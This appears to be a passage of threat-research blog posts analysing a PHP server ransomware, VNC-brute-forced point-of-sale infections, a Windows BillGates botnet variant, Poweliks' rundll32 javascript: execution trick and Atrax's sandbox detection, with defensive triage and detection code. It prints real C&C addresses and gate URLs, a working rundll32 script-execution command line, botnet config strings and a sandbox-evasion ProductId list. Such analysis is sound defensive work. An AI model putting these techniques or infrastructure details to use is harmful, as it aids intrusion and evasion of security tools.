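# File names listed in the article as part of the PHP ransomware.
CRYPT_LIBS = {"AES.php", "Base.php", "BigInteger.php", "Hash.php", "Random.php", "Rijndael.php"}
STATE_FILES = {"allenc.txt", "test.txt", "victims.txt", "extensions.txt"}


def expected_secret(hostname):
    """PHP: substr(md5("djf33" . $hostname), 2, 10) -> 10 hex chars from offset 2."""
    return hashlib.md5(("djf33" + hostname).encode("utf-8")).hexdigest()[2:12]


def triage_webroot(root, hostname):
    """Look for the ransomware's artefacts in `root` and check whether the
    secret_XXXXX.txt present matches the secret derived from `hostname`."""
    names = set(os.listdir(root))
    crypt_dir = os.path.join(root, "Crypt")
    crypt_libs = sorted(set(os.listdir(crypt_dir)) & CRYPT_LIBS) if os.path.isdir(crypt_dir) else []
    state_files = sorted(names & STATE_FILES)
    secret_files = sorted(n for n in names if n.startswith("secret_") and n.endswith(".txt"))
    expected = expected_secret(hostname)
    if len(crypt_libs) >= 3 and state_files:
        verdict = "infected"
    elif crypt_libs or state_files or secret_files:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {
        "crypt_libs": crypt_libs,
        "state_files": state_files,
        "secret_files": secret_files,
        "expected_secret": expected,
        "secret_matches_host": ("secret_%s.txt" % expected) in names,
        "verdict": verdict,
    }


def _write(path, content):
    with open(path, "w") as fh:
        fh.write(content)


def build_demo_webroot(hostname, infected=True):
    """Constructed document root for the demo (no real victim data): a plain
    site, plus the ransomware's files when infected=True."""
    root = tempfile.mkdtemp(prefix="ctb-demo-")
    _write(os.path.join(root, "index.php"), "<?php // site front page\n")
    _write(os.path.join(root, "robots.txt"), "User-agent: *\n")
    if infected:
        os.mkdir(os.path.join(root, "Crypt"))
        for lib in CRYPT_LIBS:
            _write(os.path.join(root, "Crypt", lib), "<?php // %s\n" % lib)
        for state in STATE_FILES:
            _write(os.path.join(root, state), "")
        _write(os.path.join(root, "secret_%s.txt" % expected_secret(hostname)), "")
    return root


if __name__ == "__main__":
    host = "www.example.org"   # constructed hostname
    report = triage_webroot(build_demo_webroot(host), host)
    for key, value in sorted(report.items()):
        print("%-20s %s" % (key, value))
```

A secret file that does not match the site's own hostname usually means the kit was copied over from another victim, or the site answers to a different virtual host than the one you are triaging; either way it is worth noting in the report.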

When the user clicks on the button « Decrypt », a request is sent to the gate servers:

admins = ["http://erdeni.ru/access.php", "http://studiogreystar.com/access.php", "http://a1hose.com/access.php"];
via the variable decrypt=

If the user has paid, a popup appears with the content « Your decryption key is XXXXXX » and index.php is reloaded with the correct POST parameters:

window.location.href = url + 'decrypt=' + data["decrypt"] + '&secret=' + data["secret"] + '&dectest=' + data["dectest"];

Loading this page with these parameters decrypts the files.
The servers hosting the access.php page are in fact compromised servers. So, if I want to reach the C&C server, I need to have a look at the code of access.php.
I managed to get hold of an access.php file, whose content is available at http://pastebin.com/6WX3JWXg
The C&C address is hard-coded in this page:
$result = socket_connect($sock, "95.215.45.203", 9338);
A socket is opened and the page waits for some commands such as:
– “Vic” for decrypting
– “Snd” / “Rcv” for chat feature

I don’t have the code yet behind the socket on 95.215.45.203, but even if I found it, I’ll not release it on the Internet :).

The last question to answer is how the victim websites were infected. I don’t have a clear answer to this question; here are just some elements describing these servers.
Based on the fact that a lot of victims do not have a dynamic website or a CMS, it is difficult to say whether the malware uses a well-known vulnerability.
The infected hosts run both Linux and Windows, and the majority of them (73%) host an Exim service (SMTP server).
Most of them run a password-protected webshell accessible through the “logout.php” dynamic page.
Some of them are vulnerable to Shellshock, but without deep access to the victims’ servers, it is difficult to understand how this ransomware infected the hosts.

Like every week for the past six months, a new ransomware family has popped up. This time, servers are targeted and simple PHP technology is used to perform the malicious activities.
I would like to thank nl3dee, who helped me retrieve the source code of access.php.
All the source code is available at kernelmode.info

Low-cost point of sales (PoS) hacking

Hacking point-of-sale (PoS) systems is a very trendy topic. A lot of PoS malware can be found in the wild (jackPOS, gamaPOS, Backoff, FighterPOS…). At every big breach of PoS systems, the media talk about sophisticated attacks involving high skills and great tools. But sometimes, it can be very easy to compromise a PoS, and no particular skills are required to steal sensitive information such as credit card numbers.
During our investigation, we caught a very interesting case of “low-cost” PoS hacking. This article tries to unveil the inner process of infection.

Everything started with a Win32.Ardamax sample found in the wild. Ardamax is a classic: a commercial keylogger available on the Internet.
After reversing this sample, it appears that the malware uploads data to an FTP server hosted in Germany, at server4you. This FTP server can easily be accessed (the login and password are embedded in the sample) and contains the victims’ uploaded data.
This FTP server seems to have been in use since the 9th of October 2014. It is full of samples, tools and exfiltrated data.
We cannot publish the original sample, because Server4you has not shut down the server yet.
Exfiltration server
This repository contains the original Win32.Ardamax sample, other malware (DarkComet, Andromeda, Gorynych…), some memory scrapers to retrieve credit card numbers, and website crawler scan results.
On the same repository, we can find screenshots, microphone recordings, webcam pictures as well as keystroke recordings for each infected computer.
Keylog result
Crooks have access to about fifteen point-of-sale computers as well as some SCADA systems.

Belgium SCADA
Cinema PoS
PoS
Brazilian gas pump

We spent a lot of time contacting CERTs and companies to get the computers cleaned, but day after day new infected point-of-sale data were uploaded to the FTP repository.
How were the crooks able to continuously find new targets to infect?
Among the uploaded data, some screenshots caught our attention: somebody was using a VNC brute-force tool against a large range of IP addresses.


The tool used by crooks can be retrieved from an archive uploaded to the VirusTotal website:
https://www.virustotal.com/fr/file/b6c3445386f053c1cca711c8389ac8b12d05aad46bbfec02d721428442cd2ed5/analysis/1442602500/
It seems they are using infected computers to brute force VNC servers with weak passwords. When a new VNC connection is established, a new payload is downloaded through a regular browser and installed on the newly infected machine. No exploit or sophisticated technique is employed.

Gorynych installation

Once the payload is downloaded, any installed antivirus is configured to ignore it or is even completely uninstalled. This requires administrative rights on the computer, but this is obviously quite a common situation on point-of-sale systems.


On that day, Gorynych was the payload being spread: https://www.virustotal.com/fr/file/406c30d40f3837615e3b393edc1d6667213c3d287ec006be6198d68124041d43/analysis/
Last but not least, crooks used compromised computers to administer the Gorynych panel:



For several days we followed the whole stealing process. Crooks infected point-of-sale systems and used mainstream memory scrapers like SearchforCC to exfiltrate credit card numbers.
As we can see, there is no need for sophisticated attacks or processes to infect systems. With a little more time, crooks would be able to infect a much larger range of systems. With a short list of 152 weak passwords, an attacker is able to control a lot of point-of-sale systems. In this case, crooks had access to systems ranging from small and medium-sized enterprises to companies with 500 million dollars in annual sales.
This kind of campaign would not be so easy to carry out if:
• Point-of-sale computers were not directly connected to the Internet;
• Strong VNC passwords were used;
• Administrator accounts were not used to connect to sensitive systems.
This kind of negligence can result in a huge waste of money and a very bad image for the compromised company.

Appendix

Payload found on the FTP site


Related servers


When ELF.BillGates met Windows

If you are used to playing with honeypots, you have inevitably met the ELF.BillGates malware. It is a known[1] botnet that has been spreading over the Internet for 4 years.

In a nutshell, ELF.BillGates is a (Chinese) DDoS botnet with backdooring features. It is a single binary file whose behavior depends on its installation path[2]:

  • Gate 0: Infection Monitor (dropper + persistence)
  • Gate 1: Host (contact C&C + DDoS features)
  • Gate 2: Backdooring
  • Gate 3: Utility spoofing

The “ELF.BillGates” version targets the Linux operating system. We have followed the activities of this botnet for several months and, during our investigations, we found some versions of a Windows fork of the malware. This article attempts to detail this variant.

The primary infection vector is the exploitation of CVE-2014-6332[3], which drops the binary file hosted on an HTTP File Server (HFS)[4]. This vulnerability allows an attacker to escape the Internet Explorer sandbox with a VBScript script and execute an arbitrary binary file downloaded from the Internet.

Figure 1 – Example of compromised HFS server

First and foremost, we noticed that this malware seems to be under active development. The author seems to be testing it in the wild, and several samples are unstable.

In a few weeks, we collected about thirty samples and identified 2 different versions of the malware:

    • A version that mostly works on Windows XP but is unstable on more recent operating systems.
    • A very unstable version protected with Safengine Protector (a packer against reverse engineering)[5].

Both versions reference the same symbol path:
F:\Updates\重构\Gates\Release\Gates.pdb

重构 can be translated as builder.

This article analyzes a sample of the first family named 36000.exe (sha1: 4b14d7aca890642c3e269b75953e65cb)

GatesInstall – Gate 0 – Infection monitor

PDB: F:\\Updates\\重构\\GatesInstall\\Release\\GatesInstall.pdb

This is the installation part of the malware, that will drop the different files in the system, and create persistence.

This sample is not obfuscated, but we have met some UPX-packed samples.

This binary file embeds seven executable resources.

Figure 2 – PEStudio view of the binary and its resource table

As we can infer from the PDB path, this binary file is the installer of Win32.BillGates malware.

On its first execution, it checks whether the system is already infected by trying to kill any running BillGates instance with the system tool taskkill.exe:
Taskkill /F /IM DbSecuritySpt.exe
Taskkill /F /IM Bil.exe
Taskkill /F /IM svch0st.exe
Taskkill /F /IM DNSClient.exe
Taskkill /F /IM DNSProtection.exe

/F forces the process to terminate; /IM specifies the image name.

After this check, the malware retrieves the OS version with GetVersionExA and fills a global variable with one of the following values. It is supposed to support all versions of Windows:

Windows Server 2008 R2
Windows Server 2008
Windows 7
Windows Vista
Windows Server 2003
Windows XP
Windows 2000
Windows NT
Windows 32s
Windows Unknown

After that, it checks if it runs on a 32 or a 64-bit OS with the help of the GetSystemWow64DirectoryA API.

Happy to play with an old Windows installation, I tried to launch the installer on Windows 2000 but I was disappointed: GetSystemWow64DirectoryA is only available starting from Windows XP, so the process does not start due to this unresolved reference:

Figure 3 – Error: Unable to find entry point of GetSystemWow64DirectoryA Proc on kernel32.dll

Detecting an OS older than Windows XP is therefore pointless.

After that check, the malware installation depends on the version of the OS.

On Windows 2003 / XP, the following files are created:

C:\Program Files\DbSecuritySpt\DbSecuritySpt.exe (resource 107 or 108)
C:\Program Files\DbSecuritySpt\svch0st.exe (resource 104)
C:\Program Files\Windows Media Player\agony.exe (resource 103)
C:\Program Files\Windows Media Player\agony.sys (resource 102)
C:\Program Files\Windows Media Player\DNSProtection.exe (resource 107 or 108)
C:\Program Files\Windows Media Player\DNSSupport.exe (resource 107 or 108)

On Windows 2008 Server, two additional files are created:

C:\Program Files\DbSecuritySpt\NPF.sys (resource 105)
C:\Program Files\DbSecuritySpt\packet.dll (resource 106)

DbSecuritySpt.exe, DNSSupport.exe and DNSProtection.exe have the same contents. On the 32-bit edition of the OS, resource 107 is used whereas resource 108 is used on the 64-bit variant of the OS.

After several tests, it turns out that Win32.BillGates is only able to start on Windows XP. On newer versions of Windows, the installer simply crashes. This crash seems to be related to ASLR: when the code attempts to retrieve the security cookie in functions handling buffers, it references a hard-coded address as if the binary file were loaded at a fixed address. This generates an access violation.


The rest of this article details the analysis of the malware on Windows XP.

Once the binary files are written to disk, GateInstall launches DbSecuritySpt.exe and DNSSupport.exe as services. Creating services requires administrator privileges. In most cases, attackers gain them by brute forcing the administrator RDP account on Windows Server 2003 computers.

That’s all for the installer.

General

GateInstall writes the same binary file in 3 locations:

C:\Program Files\DbSecuritySpt\DbSecuritySpt.exe (resources 107 or 108)
C:\Program Files\Windows Media Player\DNSProtection.exe (resources 107 or 108)
C:\Program Files\Windows Media Player\DNSSupport.exe (resources 107 or 108)

PDB: F:\\Updates\\重构\\GatesInstall\\Release\\Gates.pdb

Gates starts with an identification routine:

      • Decryption of its configuration
      • Check of the file path and whether it is launched as a service.

The configuration is encrypted with a hard-coded 1024-bit RSA key.

Once decrypted, the configuration data is organized in the same way as in the ELF version[6].

In the Windows version, the offsets of prime C, D and modulus N are hard-coded, meaningless and not used.

In this sample we noticed an empty campaign name, but other analyzed samples were linked to a named campaign:

39.109.0.113:36000:1:1:Cluster:0:737752:737232:736712
say.f322.net:36000:1:1:Cluster:0:737752:737232:736712
1.82.184.200:36000:1:1:linzigege319:0:737752:737232:736712
mou521.f3322.org:52000:1:1:Cluster:0:737752:737232:736712
129.231.45.171:36000:1:1:sys:0:737752:737232:736712

The Windows binary file also contains some clear-text strings that confirm it is a variant of the ELF version.

DbSecuritySpt – Gate 1 – Host

Launched as a service, DbSecuritySpt is the main persistent binary file that is run. To get into DbSecuritySpt behavior, the binary file must be launched as a service from C:\Program Files\DbSecuritySpt\DbSecuritySpt.exe.

DbSecuritySpt launches several threads in charge of fingerprinting the computer, communicating with the C&C infrastructure and performing DDoS actions.

The following data is sent to the C&C:


DDoS

This service is also in charge of taking part in DDoS campaigns.

DbSecuritySpt is supposed to support several DDoS types: ICMP, SYN, UDP and DNS amplification.

The binary file contains a list of 230 hardcoded IP addresses that correspond to DNS servers used for DNS amplification attacks[7].


We tested these DNS servers. Only 58 IP addresses seem to be still vulnerable. The other servers were either patched or unreachable.

svch0st – Gate 2 – Backdoor

PDB: E:\SVN\trunk\2014\小陈\重构\IECtrl\Release\IECtrl.pdb

小陈 can be translated as Chen and 重构 as builder.

Finally, GateInstall drops the binary file C:\Program Files\DbSecuritySpt\svch0st.exe.

The original name of this file is IECtrl.exe. IECtrl is an independent tool also used by other malware (such as Win32:Wapomi-B, https://www.virustotal.com/fr/file/4d7d9a80973b61f5fecdfdcd2e050ed9bc9541ad82ff68c864d851632ca16a77/analysis/).

It implements the backdoor functionalities of Win32.BillGates. This tool is identified by Microsoft as “Trojan:Win32/WebToos.B”.

DbSecuritySpt.exe passes a list of C&C server URLs as a parameter to IECtrl. IECtrl contains the logic to download, extract and execute payload from these URLs.

DNSSupport – Gate 3 – Spoofing utility

DNSSupport must be run as a service from the location C:\Program Files\Windows Media Player\DNSSupport.exe. Its behavior is simple: it launches DNSProtection.exe and then leaves the process in an infinite loop, preventing the service from being stopped.

DNSProtection

DNSProtection is a “spoofing utility” Gate. It is not functional in the analyzed sample. However, static analysis of the binary file allows drawing some conclusions about its internal behavior.

DNSProtection is used for hiding infection traces. It uses the rootkit Agony. Agony is composed of an executable (agony.exe) that loads and runs a driver (agony.sys). This rootkit was released in the wild some years ago. It is used for hiding files, services and network connections. This malware uses DNSProtection for hiding all dropped files (DNSSupport.exe, DNSProtection.exe, DbSecuritySpt.exe, agony.sys, agony.exe and svch0st.exe) and the connections to the C&C servers.


Agony.sys cannot be loaded on a 64-bit version of the operating system as it is not signed.

Conclusion

Win32.BillGates developers do not seem to be used to developing malware for the Windows operating system. They use poor techniques that can easily be detected by anti-virus software, and the limitations in terms of operating system compatibility could easily have been avoided. This Windows port should not be as big a threat as the ELF version.

ELF structure compared with Windows version:

      • GateInstall : Gate 0
      • DbSecuritySpt : Gate 1
      • Svch0st : Gate 2
      • DNSSupport / DNSProtection : Gate 3

Bonus

During our analysis, we noticed some samples with strange behaviors (hooking, binary file infection, IRC connections…). After further analysis, it appears that some samples were infected by the Win32.Virut and Win32.Parite viruses. Virut and Parite are viruses that infect ‘.exe’ and ‘.scr’ Windows binary files on disk. It is possible that the crooks using BillGates malware are working on infected systems.

This may also explain why a lot of Win32.Parite cleaning tools were discovered on several working BillGates C&C servers we visited.

Here is a screenshot of such a tool:


About 30% of analyzed samples were infected by Win32.Parite and 20% by Win32.Virut.

Appendices

Some Win32.BillGates hashes:


Win32.BillGates infected by Win32.Virut:

93fe8980c6279c090924e8669b0cb582
2130df6f7817c86890a5e922f99430a3

Win32.BillGates infected by Win32.Parite:

129877bf0cbc9b8239c674810675f6f7
6ab1b709903e144e7bf8fb67d7b8ec61

IOCs:

      • Created files :
        • C:\Program Files\DbSecuritySpt\DbSecuritySpt.exe
        • C:\Program Files\DbSecuritySpt\svch0st.exe
        • C:\Program Files\Windows Media Player\agony.exe
        • C:\Program Files\Windows Media Player\agony.sys
        • C:\Program Files\Windows Media Player\DNSProtection.exe
        • C:\Program Files\Windows Media Player\DNSSupport.exe
        • C:\Program Files\DbSecuritySpt\NPF.sys
        • C:\Program Files\DbSecuritySpt\packet.dll
      • Created services:
        • DbSecuritySpt
        • DNSSupport
      • Running processes:
        • DbSecuritySpt
        • DNSSupport
        • DNSProtection
        • exe

[1] https://www.botconf.eu/wp-content/uploads/2014/12/2014-2.10-Chinese-Chicken-Multiplatform-DDoS-Botnets.pdf

[2] http://www.novetta.com/wp-content/uploads/2015/06/NTRG_ElasticBotnetReport_06102015.pdf

[3] https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6332

[4] http://blog.malwaremustdie.org/2014/11/china-elf-botnet-malware-infection.html

[5] http://www.safengine.com/en-us 

[6] http://www.novetta.com/wp-content/uploads/2015/06/NTRG_ElasticBotnetReport_06102015.pdf

[7] https://blog.cloudflare.com/deep-inside-a-dns-amplification-ddos-attack/

Related works:

MalwareMustDie : http://blog.malwaremustdie.org/2014/11/china-elf-botnet-malware-infection.html

Avast: https://www.botconf.eu/wp-content/uploads/2014/12/2014-2.10-Chinese-Chicken-Multiplatform-DDoS-Botnets.pdf

Novetta: http://www.novetta.com/wp-content/uploads/2015/06/NTRG_ElasticBotnetReport_06102015.pdf

habrahabr.ru: http://habrahabr.ru/post/213973/

Poweliks – Command Line Confusion

Recently, hFireF0X provided a detailed walkthrough on the reverse engineering forum kernelmode.info about Win32/Poweliks malware. The particularity of this malware is that it resides in the Windows registry and uses rundll32.exe to execute JavaScript code.

I found it funny that we can execute some JavaScript through Rundll32 and obviously I was not the only one.


When we first saw the command line executing JavaScript, we were wondering how it worked.

In this blog post, we analyze how and why JavaScript is executed when calling this simple command line:

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";alert('foo');

Reminder about Rundll32

Rundll32 usage is documented on MSDN; it is used to call an exported function of a DLL file which can be achieved with the following command line:

RUNDLL32.EXE <dllname>,<entrypoint> <optional arguments>

entrypoint is the exported function; its prototype must be:

void CALLBACK EntryPoint(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow);

The lpszCmdLine parameter is given the <optional arguments> value specified on the rundll32 command line.

We will try to figure out how Rundll32 is able to call the function RunHTMLApplication exported by the library mshtml.dll and how the “javascript:” prefix is used to execute actual JavaScript code.

Analysis of Rundll32

Parameters

One of the first things done by Rundll32 is to parse the command line in the internal function ParseCommand. This function searches for a comma (‘,’, 0x2C) to locate the DLL name and for a space (‘ ‘, 0x20) to locate the entrypoint name.


When using our sample command line, ParseCommand returns javascript:"\..\mshtml as the DLL name and RunHTMLApplication as the entrypoint. In this context, the space after RunHTMLApplication delimits the ‘optional arguments’ part of the rundll32 command line:


Dll loader

Rundll32 will perform several tries to load the actual DLL from the initial specification javascript:"\..\mshtml.

The first test calls GetFileAttributes on the string javascript:"\..\mshtml. This function eventually accesses C:\Windows\system32\mshtml. As this file is not found, the function returns -1.

SearchPath is then invoked to resolve the DLL name. This function reads the registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\SafeProcessSearchMode. The Microsoft definition of this key is:

When the value of this REG_DWORD registry value is set to 1, SearchPath first searches the folders that are specified in the system path, and then searches the current working folder. When the value of this registry value is set to 0, the computer first searches the current working folder, and then searches the folders that are specified in the system path. The system default value for this registry key is 0.

By default this registry key does not exist (on Windows XP / 7 / 8), so SearchPath tries to load the file mshtml in the current directory of rundll32 (c:\windows\system32) before trying to locate it in the system path.

All these attempts fail and rundll32 moves to the next step. GetFileAttributes is called again, this time looking for the manifest of the module: javascript:"\..\mshtml.manifest

Since all the previous steps failed, Rundll32 eventually calls LoadLibrary("javascript:\"\..\mshtml").

LoadLibrary is just a thin wrapper around LdrLoadDll located in ntdll.dll. Internally, LdrLoadDll adds the default extension .dll and parses the resulting string javascript:"\..\mshtml.dll as a path. The token .. instructs to go one folder up: it resolves to mshtml.dll (think of foo\..\mshtml.dll resolved as mshtml.dll).

With mshtml.dll specification, LdrLoadDll is able to load the library in the system directory.

Rundll32 then calls GetProcAddress with the previously extracted entry point name RunHTMLApplication.

For the moment, the javascript: prefix seems pretty useless: LoadLibrary("foobar:\"\..\mshtml") works fine. So, why prefixing with javascript:?

Protocols Handler

Once the entry point address has been resolved, Rundll32 calls the function mshtml.dll!RunHTMLApplication.

Even though it is not documented, the actual prototype of RunHTMLApplication can be inferred from the call made by c:\windows\system32\mshta.exe (the application dedicated to launching .hta files):

HRESULT RunHTMLApplication(
HINSTANCE hinst,
HINSTANCE hPrevInst,
LPSTR szCmdLine,
int nCmdShow
);

This is not far from the function prototype expected for a rundll32 entry point:

void CALLBACK EntryPoint(
HWND hwnd,
HINSTANCE hinst,
LPSTR lpszCmdLine,
int nCmdShow
);

RunHTMLApplication receives a handle to a window instead of a handle to a module as its first parameter. This parameter is used when mshtml registers a window class and creates a window of this new class. Passing a value that does not correspond to an actual instance does not seem to disturb user32 very much…

The second parameter is not used at all, so the mismatch is not important.

The last parameter, nCmdShow, is used by the RunHTMLApplication function to display the window hosting the HTML application. Rundll32 always calls the entry point function with the value SW_SHOWDEFAULT to instruct any potential opened window to use window default placement.

The main parameter of interest would be lpszCmdLine, which in our case is ";alert('foo').

This obviously leads to an issue since this is not a valid JavaScript statement (please note the missing double-quote at the end of the statement). But it works anyway, because RunHTMLApplication ignores the given parameter and prefers to request again the original command line from the GetCommandLine Windows API (wrapped in a call to the GetCmdLine function).

The full command line contains the name of the executable and the parameters; GetCmdLine extracts the parameters by stripping the executable specification.

After that, RunHTMLApplication calls CreateUrlMoniker.

This is where the string “javascript:” is essential.

CreateUrlMoniker parses the command line to extract the string before the ':' character (0x3A): “javascript”.

CreateUrlMoniker enumerates the registry key HKCR\SOFTWARE\Classes\PROTOCOLS\Handler\. Its subkeys refer to a set of protocols and their CLSID.

CreateUrlMoniker finds an appropriate protocol handler for the JavaScript protocol (HKCR\SOFTWARE\Classes\PROTOCOLS\Handler\javascript).

The CLSID {3050F3B2-98B5-11CF-BB82-00AA00BDCE0B} matches “Microsoft HTML Javascript Pluggable Protocol”.

It is for this reason that the string “javascript” is essential in the beginning of the parameters.

The same mechanism comes into play when one types javascript:alert('foo'); in the Internet Explorer navigation bar.

The remainder of the string, located after the ':' separator, is interpreted by the JavaScript URL moniker as JavaScript instructions:

"\..\mshtml,RunHTMLApplication ";alert('foo');

This is valid JavaScript: a string literal "\..\mshtml,RunHTMLApplication " (hence the double quotes that were carried along in all the previous steps!) followed by a function call (alert).

Finally RunHTMLApplication calls CHTMLApp::Run and the JavaScript is executed:


Security point

From a security point of view, executing JavaScript through Rundll32 is like executing an HTML Application.

In other words, we get all the power of Internet Explorer—its object model, performance, rendering power and protocol support—without the strict security model and user interface of the browser. Zone security is off, cross-domain script access is allowed, and the script has read/write access to the files and system registry on the client machine.

With this trick, JavaScript is executed outside the Internet Explorer process, and the script is not subject to security mechanisms such as Protected Mode / sandboxing on Vista and later.

Conclusion

RunHTMLApplication has the perfect prototype to work with Rundll32. Attackers have made great efforts to build a command line using the perfect syntax for passing through all the mechanisms (library loading, command line parsing, URL syntax correctness, valid JavaScript, etc.) leading to JavaScript execution in an uncontrolled environment.

From our understanding, this technique allows bypassing some security products that may trust actions performed by the built-in rundll32 while specifying the script to run without writing any file on the file system.
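The chain of string splits described above, reproduced as an added Python model (not part of the original post and not Microsoft's code; the function names are ours) so the three parsers can be stepped through on the sample command line, followed by a defensive check for rundll32 command lines that rely on the same trick:

```python
"""Model of the string handling a rundll32 javascript: command line goes through."""
from typing import Optional, Tuple

# The command line analyzed in the post, as a constructed literal.
POWELIKS_CMDLINE = (
    'rundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication ";alert(\'foo\');'
)


def split_program(cmdline: str) -> Tuple[str, str]:
    """Separate the executable token (quoted or bare) from its arguments."""
    cmdline = cmdline.lstrip()
    if cmdline.startswith('"'):
        end = cmdline.index('"', 1)
        return cmdline[1:end], cmdline[end + 1:].lstrip()
    program, _, args = cmdline.partition(" ")
    return program, args.lstrip()


def parse_command(args: str) -> Tuple[str, str, str]:
    """Mimic rundll32!ParseCommand: the DLL name runs up to the first comma
    (0x2C), the entry point from there to the first space (0x20), and the
    rest becomes lpszCmdLine. Quotes are not interpreted, so the opening
    double quote stays glued to the DLL name."""
    dll, _, rest = args.partition(",")
    entry, _, optional = rest.partition(" ")
    return dll, entry, optional


def resolve_dll(dll_spec: str) -> str:
    """Mimic the path handling in ntdll!LdrLoadDll: append the default .dll
    extension when missing, then walk the string as a path so that each
    '..' discards the preceding component (foo\\..\\mshtml.dll -> mshtml.dll)."""
    name = dll_spec if dll_spec.lower().endswith(".dll") else dll_spec + ".dll"
    stack = []
    for component in name.split("\\"):
        if component == "..":
            if stack:
                stack.pop()
        elif component not in ("", "."):
            stack.append(component)
    return "\\".join(stack)


def url_scheme(args: str) -> Tuple[Optional[str], str]:
    """Mimic the first step of urlmon!CreateUrlMoniker on the argument string
    RunHTMLApplication re-reads via GetCommandLine: everything before the
    first ':' (0x3A) is the protocol name looked up under
    PROTOCOLS\\Handler\\<scheme>; the remainder is handed to that handler."""
    scheme, colon, rest = args.partition(":")
    if not colon:
        return None, args
    return scheme.lower(), rest


def walk_through(cmdline: str) -> dict:
    """Run the three parsers in the order the post describes and collect
    what each component sees."""
    program, args = split_program(cmdline)
    dll, entry, optional = parse_command(args)
    scheme, script = url_scheme(args)
    return {
        "program": program,
        "dll_spec": dll,            # what ParseCommand hands to the loader
        "entry_point": entry,       # what GetProcAddress is asked for
        "lpszCmdLine": optional,    # the (ignored) third entry-point argument
        "loaded_module": resolve_dll(dll),
        "scheme": scheme,           # protocol handler selected by the moniker
        "script": script,           # text the javascript handler evaluates
    }


def is_suspicious_rundll32(cmdline: str) -> bool:
    """Defensive check: flag a rundll32 invocation whose DLL token does not
    name the module the loader will actually map. A scheme-like prefix (more
    than one character before ':', so drive letters pass) or a '..' component
    means the literal token hides the real DLL, which is exactly what the
    javascript: command line relies on."""
    program, args = split_program(cmdline)
    basename = program.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if basename not in ("rundll32.exe", "rundll32"):
        return False
    dll, _entry, _optional = parse_command(args)
    prefix, colon, _ = dll.partition(":")
    scheme_like = bool(colon) and len(prefix) > 1
    traversal = "\\..\\" in dll or dll.startswith("..\\")
    return scheme_like or traversal


if __name__ == "__main__":
    for key, value in walk_through(POWELIKS_CMDLINE).items():
        print(f"{key:>14}: {value}")
    print("suspicious:", is_suspicious_rundll32(POWELIKS_CMDLINE))
```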

That’s all folks!

Win32/Atrax.A

Atrax is a malware family discovered during the summer of 2013. It includes some basic features like distributed denial of service, keylogging, stealing banking credentials, sending spam and installing a Bitcoin miner. The particularity of Atrax is that it communicates with its command and control server over Tor, an anonymity network. An ESET blog post gives more information about this Tor-based botnet: http://www.welivesecurity.com/2013/07/24/the-rise-of-tor-based-botnets/.

Atrax's advertised specification lists anti-analysis techniques:

[...]
- Anti-Analyzer (Protection against e.g. anubis.iseclab.org, malwr.com)
- If you need: Anti-VM (Please request it explicitly)
- Anti-Debug/Anti-Hook Engine
[…]

The sample we studied was seen in the wild in April 2014 and submitted to the VirusTotal web site (https://www.virustotal.com/en/file/adf246a57baecef5c8c85c60152e9b2f5060bf2e720ad1623cc95177e7259401/analysis/).

We chose to analyze the Atrax botnet as part of our permanent security monitoring, in order to make sure that our HIPS engine is able to block new techniques used by attackers. This article is not a full analysis of the malware; it focuses on the capabilities meant to avoid detection or analysis.

Sandbox detection

We started by looking at the anti-sandbox capability. To obtain a fast dynamic analysis of a potential malware sample, many online services provide sandboxes that give a deeper look at what the application does on the operating system: the principle is to run the sample in a virtual machine and trace its behavior. When the timeout expires, the service produces a report and resets the virtual machine to its initial state for the next analysis. This way, we can quickly know whether a binary file is malicious or not. Malware now tries to detect this kind of sandbox so that analysts cannot observe its behavior and security solutions cannot block it proactively.

To test the protection mechanism of Atrax, the sample was submitted to multiple online sandboxes:

  • Anubis http://anubis.iseclab.org/: when executed, the binary file crashes (STATUS_ACCESS_VIOLATION), preventing behavioral analysis. This is the normal behavior of Atrax when it detects an online sandbox. The virtual machine was not infected.
  • Malwr http://malwr.com: the binary file runs normally; the virtual machine was infected.
  • JoeBox (CWSandbox / File-analyzer) http://file-analyzer.net/: the binary file runs normally; the virtual machine was infected.
  • Comodo http://camas.comodo.com: the binary file runs normally; the virtual machine was infected.

Except for Anubis, it becomes clear that the sandbox detection is not fully functional. This is due to the method used for environment fingerprinting: Atrax simply looks at the ProductId of the operating system.

ProductId is a unique value of 20 digits derived from the product key and the hardware configuration. This key is only displayed to the user for information and can be used when contacting Microsoft Support. It is stored in the registry value HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductId. You can display it by right-clicking My Computer and selecting Properties.

Because it is unique, this key identifies the computer. However, it is possible to alter it without causing any instability.

Atrax has a hardcoded list of ProductId keys:

-   1: 76487-640-1457236-23837
-   2: 76487-644-3177037-23510
-   3: 55274-640-2673064-23950
-   4: 76497-640-6308873-23835
-   5: 76487-640-1464517-23259

If it finds one of these values, it means that the current environment is an online sandbox, and the Atrax process exits with an access violation.

In order to check which sandboxes these values correspond to, we developed a test program that displays the ProductId value of the sandboxes available on the Internet.

Some sandboxes report screenshots of the virtual machine, so it is easy to read the ProductId from a MessageBox. For sandboxes that do not report screenshots, the binary file creates a text file with the ProductId as its filename.

#include <windows.h>
#include <tchar.h>
#include <stdio.h>

/* Read HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductId, display it
   (for sandboxes that report screenshots) and create an empty file named after
   it (for sandboxes that only report file system activity). */
static void report_product_id(void)
{
    HKEY hkey = NULL;
    LONG lResult = RegOpenKeyEx(HKEY_LOCAL_MACHINE,
                                TEXT("Software\\Microsoft\\Windows NT\\CurrentVersion"),
                                0, KEY_QUERY_VALUE, &hkey);
    if (ERROR_SUCCESS == lResult)
    {
        DWORD keytype;
        TCHAR data[200];
        DWORD bread = sizeof(data);   /* buffer size in bytes, not characters */
        lResult = RegQueryValueEx(hkey, TEXT("ProductId"), NULL, &keytype,
                                  (BYTE*)data, &bread);
        if (ERROR_SUCCESS == lResult)
        {
            /* Key found: show it and leave a trace in the file system */
            FILE *found;
            MessageBox(0, data, TEXT("fingerprint"), MB_OKCANCEL);
            found = _tfopen(data, TEXT("w"));
            if (found)
                fclose(found);
        }
        RegCloseKey(hkey);
    }
}

With this trick, we have determined that the first key (76487-640-1457236-23837) is the ProductId of Anubis sandbox. This is why the execution inside this sandbox turns into STATUS_ACCESS_VIOLATION.

